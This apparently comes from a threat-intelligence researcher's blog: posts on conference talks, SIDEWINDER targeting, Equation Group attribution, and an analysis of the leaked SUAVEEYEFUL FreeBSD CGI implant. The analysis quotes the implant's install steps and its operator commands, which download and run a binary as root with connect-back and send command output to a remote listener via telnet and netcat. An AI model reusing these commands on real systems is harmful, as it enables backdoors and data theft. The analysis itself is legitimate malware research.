2022 CTI-EU Talk: Threat Landscape and Defences Against Mobile Surveillance Implants
In December 2022 I had a very pleasant surprise, I was given an opportunity to give a lightning talk at the European Union Agency for Cybersecurity (ENISA) Cyber Threat Intelligence (CTI) conference of 2022, known as CTI-EU 2022. I had attended previous editions of this event and it was an amazing experience, so having that opportunity was a great honour.
I had a few different topics that I was researching around that time and after a small discussion with the organisers we agreed that the best option would be the “Threat Landscape and Defences Against Mobile Surveillance Implants”.
If you’d like to see what other presentations took place during the CTI-EU 2022, check out the published agenda for the event. There were some very valuable presentations, but of course, being an on-site event, the most important part was the face-to-face interactions. With this event ENISA manages to bring public and private sector CTI experts together and we had numerous fruitful conversations ranging from CTI topics, to public/private sector collaborations, challenges, and more.
I’m not sure if/when ENISA will publish the slides from the TLP:WHITE talks, but if you’d like to see mine you can get them here. Apparently, being a lightning talk I couldn’t go in-depth in almost anything, but if you are interested in something mentioned in my slides (but with more depth), please contact me. Additionally, if you are researching this space and would like a second pair of eyes, I’d be more than happy to help.
OSINT: A Summary of SIDEWINDER Operations in 2022
SIDEWINDER (also known as RAZOR TIGER, RATTLESNAKE, T-APT-04, HARDCORE NATIONALIST, and APT-C-17) is a cyber espionage actor who has been active at least since 2012. I had a look on all the publicly known 2022 operations (that I could find) attributed to this actor to derive some insights and here’s the outcome.
The main outcome we can derive is that SIDEWINDER is focusing mainly on Pakistani military targets (particularly the Navy) to conduct cyber espionage.
In terms of the data I used, through publicly available information I found 40 unique events (let’s call them operations) for the period of January 2022-December 2022 and here are some statistics…
Note: Apparently this is a tiny number compared to Kaspersky’s “over 1,000 new attacks since April 2020” but I tried to keep it limited to 2022, publicly available reports, and only those that had some context. Not just IOCs.
Many identify SIDEWINDER as an Indian cyber espionage actor and based on the targets of Figure 1 and Figure 2 I’d say that we can safely assume that their main target is Pakistani military entities which makes this actor better aligned with what a military intelligence agency would be performing. Maybe something like India’s Directorate of Military Intelligence? Apparently, there are no hard evidence here to be certain about this, just some food for thought.
Considering the main target is the Pakistani military, here’s a breakdown of the specific SIDEWINDER targets in Pakistan from the limited 2022 dataset I mentioned in the introduction.
Based on that limited dataset, clearly the Pakistani Navy was by far the top target of SIDEWINDER for 2022, strengthening the hypothesis of SIDEWINDER being an actor associated with India’s military intelligence, or even naval intelligence.
With such small sample sets, timelines aren’t particularly valuable but I know that people will be asking for it so here is a timeline analysis too.
BSides Cyprus: Cloud… Just somebody else’s computer
Just noticed that I haven’t published much for the last few talks I’ve been giving and this is one of them…
That was my 8th, and last, talk for 2021. It was a research more on the cloud security architect/engineering side. That was my second time participating in BSides Cyprus, and as always, it was an amazing event with amazing people. The organizers of BSides Cyprus did a remarkable job. From the set up of the remote event, to the CTF, the prizes for the CTF participants, and the overall atmosphere, it was an excellent event.
Now specifically on my talk, that was a subject that I was preparing for around a year and I’m glad I got to talk about it in BSides Cyprus. For various reasons, public cloud providers are intentionally abstracting lots of the plumbing on how everything is put together and how does this affect security.
So, in this talk I picked up a few services from AWS, GCP, and Azure and dissected them to demonstrate that:
- It’s just computers and software under the hood
- How having this “inner” architectural understanding helps you uncover vulnerabilities (using some publicly available ones in the examples, no 0days or embargoed issues revealed)
My goal with this talk wasn’t to uncover some significant design flaw or claim that public cloud is bad. Just to raise awareness and change the mindset of security engineers when working with public cloud to think beyond what the vendor’s documentation says. If you’d like to have a look, you can find my slides here.
Why the Equation Group (EQGRP) is NOT the NSA
I had covered this topic in my 2021 talk “In nation-state actor’s shoes” but after my recent blog post I saw again people referring to the EQGRP as the NSA which is not entirely correct. EQGRP is actually a combination of cyber operators (mostly) from the NSA’s TAO and the CIA’s IOC. So, a more accurate statement would be that the EQGRP is the US intelligence community. Here’s why…
WikiLeaks did the Vault 7 leak in 2017. Over the years this was confirmed to be a real/valid leak, and it provides unprecedented access not only on the CIA tools themselves, but also the culture and work environment inside CIA’s cyber component. This is the core source of this blog post.
Brief History of CIA IOC
After the 9/11 terrorist attacks, the CIA took the lead in the counter-terrorism efforts of the US, gaining access to almost unlimited budget, support, and resources to achieve its mission. That also meant that CIA could now expand their domain beyond their area of expertise, Human Intelligence (HUMINT), to other intelligence (and covert action) disciplines, including Signals Intelligence (SIGINT). In other words, develop their own cyber capabilities.
In 2015 the CIA publicly announced a new directorate responsible for improving the Agency’s digital capabilities. This reportedly started from a 2013 initiative by CIA Director Brennan. It was named the Directorate of Digital Innovation (DDI), headed by a Chief Information Officer (CIO), and covering all sorts of topics like modernisation of digital platforms, digitisation of manual processes, developing software for CIA’s needs, etc. Unsurprisingly, CIA’s DDI was relying extensively on the US intelligence community’s experts to develop those capabilities and by far the most mature US agency for cyber operations/SIGINT is the Department of Defense’s National Security Agency (NSA).
Inside DDI, CIA created the Center for Cyber Intelligence (CCI) which was responsible for intelligence support from the cyber domain. As per the Vault 7 leak this is where the “hacking division” (as WikiLeaks called it) fell under in 2016, when it had over 5000 registered users responsible for developing, maintaining, enhancing and using cyber capabilities to support CIA’s mission. Based on the Vault 7, this was the Information Operations Center (IOC). IOC was the cyber operators of CIA’s CCI. Meaning they were using the capabilities provided by other departments of CCI to support CIA’s intelligence operations from the cyber space.
Based on the leaks we can be certain that CCI was operational (maybe under a different org. structure) years before that 2015 public announcement for DDI, at least since 2008-2009.
The CIA EDG and TAC
One of the largest departments within the CCI was the EDG (Engineering Development Group), responsible for multiple divisions of engineering branches that were developing and maintaining different cyber capabilities for the IOC operators, the wider US intelligence community, and close allies. For instance, the Applied Engineering Division (AED) that had the Embedded Development Branch (EDB), Remote Development Branch (RDB), Operational Support Branch (OSB), etc.
A senior group of EDG employees were members of the EDG’s Technical Advisory Council (TAC) which, as its name implies, was there to review different technical challenges and provide input and expert recommendations.
The TAC Discussion on EQGRP
After Kaspersky’s “Inside the EquationDrug Espionage Platform” was published, the TAC started a discussion to identify the mistakes that led Kaspersky GReAT researchers uncovering a vast amount of US cyber capabilities, and associating them all under the EQUATION GROUP (EQGRP) alias. Here you can read the full thread on WikiLeaks.
From this discussion alone, we can see that:
- EQGRP was actually a collection of capabilities by mostly NSA’s Tailored Access Operations (TAO) and CIA’s IOC
- In some cases parts of the same implant were co-authored by CIA and NSA
- CIA IOC and NSA TAO had different processes (or lack of them) for (re-)using cyber capabilities
And many lessons learned to avoid this compromise of their capabilities in the future. In general, I highly recommend you reading this thread since it’s a nice retrospective giving a glimpse into a nation-state actor’s reactions when a high-quality threat intelligence report is released.
Conclusion
News, and even some cyber threat intelligence analysts, repeating the narrative of EQGRP being the NSA is almost certainly wrong. Unless that Vault 7 was a deception operation (unlikely after all the past years’ research on it), we can conclude that the above discussion by TAC makes it very clear that EQGRP was a collection of cyber capabilities used by the cyber operators of the United States, mostly by NSA’s TAO and CIA’s IOC.
I know it’s not as sexy saying that the US was behind it compared to NSA TAO was behind it; and indeed, we can make some assumptions that exploits from the early 2000s were most likely from NSA TAO since CIA either didn’t had that capability yet, or it was still in its early development stages, heavily relying on NSA’s support, or use other means to decouple EQGRP into smaller actors for the CIA, the NSA, and others. However, EQGRP as it’s known today, it’s almost certainly not the NSA alone.
Lastly, any time you talk about nation-state attribution don’t forget that it’s called the “intelligence community” for a reason. Agencies in an IC share capabilities. Some (like within the same country) would be sharing almost everything, others (like the FIVE EYES) are sharing a lot, and others (like the MAXIMATOR) share more specific capabilities and products. And also remember that (that’s an excerpt from my 2021 talk):
- Nation-state actors are just people doing a job with specific objectives and performance goals
- It’s hard (usually) to know the intention. This is why geopolitical monitoring matters
- Infrastructure of an APT doesn’t mean the same APT executed the operation or that they were interested in you
- APT groups do most of their collection in bulk/automated fashion yet almost all research focuses on tailored/targeted access
- Attribution is hard… Think critically before you publish
The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP
I was checking the 2017 ShadowBrokers leaks when I noticed that one of the EQUATION GROUP tools leaked back then has no public references/analysis (at least as far as I can tell). So, here is what this software implant does and how it works. This was in a directory titled suaveeyeful_i386-unknown-mirapoint3.4.3 and it reveals lots of interesting details. In summary:
- SUAVEEYEFUL is a CGI software implant for FreeBSD and Linux
- SUAVEEYEFUL was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University at least since the early 2000s
- The leaked file/operation was targeting MiraPoint email products
- SUAVEEYEFUL had some innovative, for its time, TTPs like data encryption and fileless malware
The Leaked Files
In that directory there are a few different files. Those are:
- bdes: A copy of the FreeBSD bdes (tool to encrypt/decrypt using DES) command line utility, based on the FreeBSD bdes version 1.3.2.1 (from 22 Sep. 2000), but compiled on Linux in 2003.
- decode-base64: Simple Perl decoding script using MIME::Base64.
- implant: ELF binary software implant component of SUAVEEYEFUL, built for i386 on FreeBSD version 4.3 (this version was released in April 2001).
- implant.mg1.waseda.ac.jp: ELF binary software implant component of SUAVEEYEFUL used against the Japanese Waseda Research University’s email gateway (variant of the implant file).
- opscript.se: The commands to execute in order to install the SUAVEEYEFUL (abbreviated as SE) software implant in the Japanese Waseda Research University.
- se: The client component of the SUAVEEYEFUL software implant, written in Bash. This copy has hardcoded targets for the Japanese Waseda Research University.
- se.old: Previous version of the SUAVEEYEFUL software implant client, written in Bash. This copy has a hardcoded target for the Chinese Ministry of Foreign Affairs email gateway.
- uriescape: Simple Perl script using URI::Escape.
The utilities (bdes, decode-base64 and uriescape) were bundled along with SUAVEEYEFUL because they are internally used. This ensured that the software implant would not rely on any external dependencies (other than default, at the time, core system utilities like ls, cat, telnet, etc.)
Targets
The se.old client was potentially the one the operators were adapting for their new target. That is due to inconsistencies in its content which make it look like a draft/edited version of an old operation. A leftover comment identifies the mail.mfa.gov.cn (202.99.26.6) as its configured SUAVEEYEFUL target.
This was the email gateway of the Chinese Ministry of Foreign Affairs (MFA). Even to today, this IP address (202.99.26.6) still points to an email server from China’s MFA. It’s hard to determine when the EQUATION GROUP compromised this email server using the SUAVEEYEFUL software implant. Based entirely on the build times, we can assess that it was at least since the early 2000s.
Most of the files included in the leaked directory were designed for another target. The email gateways of the Waseda Research University, which according to its official website, “strives to conduct cutting-edge research that solves world problems and contributes to the greater good of society. Unorthodox thinking and intellectual curiosity are what drive research at Waseda.”
The se client had two compromised Waseda email gateways configured, and both accessed via their internal IP addresses from another compromised host, referenced only by its IP address. So, at least 3 systems in Waseda’s infrastructure were compromised by the EQUATION GROUP since at least 2003.
- mp450 (10.1.2.208)
- mg1.waseda.ac.jp (10.9.4.15)
- 10.1.2.150 – another compromised host
The top host (mp450) was the university’s MiraPoint 450 (later renamed to RazorGate 450), an email security appliance. And the other host (mg1.waseda.ac.jp) was the MiraPoint email gateway. The third host is still unknown, but based on its IP range (similar to that of mp450) we can deduce that it was likely a system located in the university’s DMZ network segment.
Installation of SUAVEEYEFUL in Waseda’s MiraPoint Servers
This is clearly described in the opscript.se file which we can assume that it was one of the first operational tasks that the EQUATION GROUP operators executed to install the SUAVEEYEFUL software implant. Here is that process:
- Copy the implant to the /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi file
- Change nph-help.cgi‘s file permissions to 555
- Change nph-help.cgi‘s ownership to “root” with group “nobody”
- Use touch -r to ensure file nph-help.cgi as well as anything under /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/ directory have the same timestamps as the legitimate /var/www/data/help/apps/locale/ja_JP.utf-8/utilities/publish.html MiraPoint web service
- Use netcat to start a listening on port 444, decoding the received data with Base64 and decrypting them using bdes with a hardcoded key (0x4790cae5ec154ccc in this case)
- Connect-back from mp450‘s SUAVEEYEFUL implant to the listening 4444 port and provide some basic system information (who is logged in, list files/directories, etc.)
The SUAVEEYEFUL Software Implant
The SUAVEEYEFUL (or SE) has two components, the client and the server. The server component is a very simple CGI program written in C for FreeBSD, and looking for input at its help endpoint. Any commands received would be executed (with root privileges as shown in the previous section) using the system() library call, as long as they match the defined format (described later in this post).
The client side ensures that all requests are properly requested, encoded (using Base64) and encrypted (with DES). The client supported 4 options:
- -h: Display help message
- -c: Execute command
- -i: Input target (e.g. the URL of a host running the SE server component)
- -k: Key used for DES encryption
As we can see from this, for the generation of the cryptographic material, EQUATION GROUP was using the system’s /dev/random in the following way:
head -c 8 /dev/random | hexdump -e '/8 \"0x%016x\n\"'
The command was then structured with # being used as a separator. The main command to be executed was constructed with this:
echo "`head -c 8 /dev/random | hexdump -e '/8 "%016x\n"'`#`date +"%s"`#$cmd"|bdes -k $key > out
Which results into a format that looks like that:
This structure was then encrypted using the hardcoded DES key, and passed through uriescape tool to ensure that there will be no parsing issues by the receiving MiraPoint web server.
Apart from the above, the client also used the date +”%N” command to get the date in nanoseconds and encrypt it with a key matching the same value. This was an anti-analysis/anti-detection trick since it would be hard for anyone to get the SE software implant to execute any command without this non-intuitive addition to its expected input.
Lastly, the SE help message displayed three instructions on example commands that the operator could use. The three help commands were performing the following tasks:
- Install a fileless malware by doing the following:
- Create a hidden directory (/tmp/.scsi)
- Use curl to download a binary deceivingly named sendmail from the operational host (10.1.2.150:5555/sendmail)
- Run sendmail as root and connect-back to the operational host on a different port (10.1.2.150:9999)
- Remove the sendmail binary file so that it’s running only in memory, not from the filesystem
- Execute commands with connect-back method:
- Run w followed by ls -l and ls -l /tmp to get the logged in users and contents of the current and /tmp directories
- Encrypt and encode the output
- Send it to the operational host on its listening port (10.1.2.150:4444)
- The message also guides the operator on how to generate a new DES encryption key
- Same as #2 but without the Base64 encoding and DES encryption
Here is the full help message:
1) se -c"(mkdir /tmp/.scsi; cd /tmp/.scsi; /usr/bin/curl http://10.1.2.150:5555/sendmail -osendmail;chmod +x sendmail;D=-c10.1.2.150:9999 PATH=. /usr/bin/asroot sendmail;rm -f sendmail) > /dev/null 2>&1" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
2) se -c"(w; ls -l; ls -l /tmp) | bdes -k SECRET | mmencode | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444 | decode-base64 | bdes -d -k SECRET
Use this to generate a random key and replace SECRET with the key
head -c 8 /dev/random | hexdump -e '/8 "0x%016x\n"'
3) se -c"(w; ls -l; ls -l /tmp) | telnet 10.1.2.150 4444" -i"http://mp450/help/apps/locale/ja_JP.utf-8/utilities/nph-help.cgi/help"
with nc -l -p 4444
WARNING
WARNING
DO NOT -burn!!!
Use -exit
xorl %eax, %eax 